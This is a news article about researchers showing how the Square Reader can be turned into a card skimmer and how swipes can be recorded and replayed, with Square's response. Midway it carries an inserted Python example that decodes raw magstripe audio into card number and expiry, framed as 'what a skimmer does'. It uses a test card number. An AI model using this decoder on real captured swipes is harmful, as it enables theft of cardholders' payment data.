Next time just be careful while swiping your credit card at small retailers or trendy stores that use Square Reader to accept credit card payments.
The increasingly popular and widely used Square Reader can be easily turned into a skimming device that can be used to steal your credit card data, a group of researchers warned.
Square Reader is a tiny device that plugs into a smartphone and lets small retailers accept credit and debit card payments without buying a traditional point-of-sale system.
However, despite its convenience, this cheap and easy-to-use alternative has a critical flaw that could allow anyone to easily steal your payment card information.
All an attacker needs is a screwdriver, superglue, and roughly 10 minutes to turn the latest-generation Square Reader into a tiny, portable card skimmer.
Converting a New Generation Square Reader into a Card Skimmer?
A team of three security researchers from Boston University has discovered a way to physically modify the device and disable the encryption that normally protects card data as it is transmitted from the reader to the smartphone.
The tampered device will look exactly like the Square Reader, but Square counters that the tampered device won't work with the official Square app.
However, the researchers claim that even so, the modified device can still be used as a regular credit card skimmer that records and stores card information.
An attacker could even develop an unofficial app that looks legitimate but hides skimming code underneath. While the chances of encountering such a device are slim, it is worth keeping an eye on your bank statements.
Method to Steal Credit Card Data without tampering with Square Reader
Besides this method, the researchers also discovered another flaw that allowed them to record card swipes directly on a smartphone, even when using a regular, unaltered, encrypted reader.
A malicious merchant could use this method to scam customers by recording their card swipes on the phone and later playing them back through the Square app to make fraudulent transactions.
"I can take that signal and convert it using a decoder freely available online, and then I have your credit card information," Alexandrea Mellen, one of the three security researchers, told Motherboard.
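To make concrete what "convert it using a decoder" means for a reader whose encryption has been stripped out (the tampered-reader scenario above) or for any plain swipe head feeding a phone's audio jack, here is an added example that is not the researchers' code and not Square's. A card's Track 2 is written as F2F (Aiken biphase) flux reversals; a swipe head turns those reversals into a small AC waveform, and an audio-jack reader with no encryption in the path hands that waveform straight to the phone's microphone input. The block constructs such a waveform from a made-up Track 2 string and then recovers the card data from the samples. The sample rate, bit-cell timing and card data are assumptions (the PAN is the standard 4111... test number, not a real account), and Square's own encrypted audio protocol is not modelled.

```python
"""Added example: decoding a raw, unencrypted magstripe swipe captured as audio-style samples."""
from typing import Dict, List, Optional

SAMPLES_PER_CELL = 8                  # assumed samples per bit cell (constructed, not a real rate)
TRACK2_CHARS = "0123456789:;<=>?"     # Track 2 alphabet: 4 data bits + odd parity per character
START_SENTINEL, FIELD_SEP, END_SENTINEL = ";", "=", "?"


def _with_parity(val: int) -> List[int]:
    """4 data bits LSB first, followed by an odd-parity bit."""
    nibble = [(val >> i) & 1 for i in range(4)]
    return nibble + [1 - sum(nibble) % 2]


def encode_track2_bits(data: str) -> List[int]:
    """Bit stream for ';' + data + '?' + LRC, as it sits on the stripe."""
    bits, lrc = [], 0
    for ch in START_SENTINEL + data + END_SENTINEL:
        val = TRACK2_CHARS.index(ch)
        lrc ^= val                    # LRC is the XOR of every character, sentinels included
        bits += _with_parity(val)
    return bits + _with_parity(lrc)


def f2f_waveform(bits: List[int], clocking_zeros: int = 10) -> List[int]:
    """Aiken biphase: a flux reversal at every cell boundary, plus one mid-cell for a 1.
    Returns +1/-1 samples, like a crude line-in capture. The leading and trailing
    zero cells stand in for the clocking bits a real stripe carries around the data."""
    level, samples = 1, []
    half = SAMPLES_PER_CELL // 2
    for bit in [0] * clocking_zeros + bits + [0] * clocking_zeros:
        level = -level                # boundary reversal
        samples += [level] * half
        if bit:
            level = -level            # mid-cell reversal marks a 1
        samples += [level] * (SAMPLES_PER_CELL - half)
    return samples


def demodulate(samples: List[int]) -> List[int]:
    """Recover bits from reversal timing: a full-cell gap is a 0, two half-cell gaps are a 1."""
    edges = [i for i in range(1, len(samples)) if samples[i] != samples[i - 1]]
    gaps = [b - a for a, b in zip(edges, edges[1:])]
    period = gaps[0]                  # the first gap lies inside the clocking zeros: one full cell
    bits, i = [], 0
    while i < len(gaps):
        if gaps[i] > 0.75 * period:
            bits.append(0)
            i += 1
        else:
            bits.append(1)
            i += 2                    # consume both halves of the cell
    return bits


def decode_track2(bits: List[int]) -> str:
    """Find the start sentinel, check each character's parity, then verify the trailing LRC."""
    sentinel = _with_parity(TRACK2_CHARS.index(START_SENTINEL))
    start: Optional[int] = next((i for i in range(len(bits) - 4) if bits[i:i + 5] == sentinel), None)
    if start is None:
        raise ValueError("start sentinel not found")
    chars, lrc, pos = [], 0, start
    while pos + 5 <= len(bits):
        group = bits[pos:pos + 5]
        if sum(group) % 2 != 1:
            raise ValueError("parity error at bit %d" % pos)
        pos += 5
        val = sum(b << i for i, b in enumerate(group[:4]))
        if chars and chars[-1] == END_SENTINEL:   # the group after '?' is the LRC
            if val != lrc:
                raise ValueError("LRC mismatch")
            return "".join(chars)
        lrc ^= val
        chars.append(TRACK2_CHARS[val])
    raise ValueError("end sentinel not found")


def parse_track2(track: str) -> Dict[str, str]:
    """Split Track 2 into PAN, expiry (YYMM), service code and discretionary data."""
    pan, rest = track.strip(START_SENTINEL + END_SENTINEL).split(FIELD_SEP, 1)
    return {"pan": pan, "expiry": rest[:4], "service_code": rest[4:7], "discretionary": rest[7:]}


# Constructed card data: a standard test PAN, not a real account.
SAMPLE_TRACK2 = "4111111111111111=25121011234567890"


def skim(samples: List[int]) -> Dict[str, str]:
    """What a skimmer does with a captured swipe: demodulate, validate, parse."""
    return parse_track2(decode_track2(demodulate(samples)))


if __name__ == "__main__":
    capture = f2f_waveform(encode_track2_bits(SAMPLE_TRACK2))
    print(skim(capture))
```

The parity and LRC checks are what separate a usable capture from noise: a single flipped bit anywhere in a character fails odd parity, so a skimmer (or a forensic examiner looking at a dumped capture) can tell a clean swipe from a corrupted one without any knowledge of the card scheme. Nothing here helps against the encrypted reader; that path is attacked by replaying the recorded signal, not by decoding it.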
Square acknowledged that recorded swipes can be played back using the methods the researchers described, but the company did not treat this as an actual flaw.
"We do not see it as a security risk," a Square employee wrote in the report published on Square's bug bounty program on HackerOne. "In particular, it is not possible to process a stored swipe more than once."
The three security researchers, John Moore, Alexandrea Mellen and Artem Losev, are going to present their findings during a talk, "MOBILE POINT OF SCAM: ATTACKING THE SQUARE READER," on Wednesday at the Black Hat security conference in Las Vegas.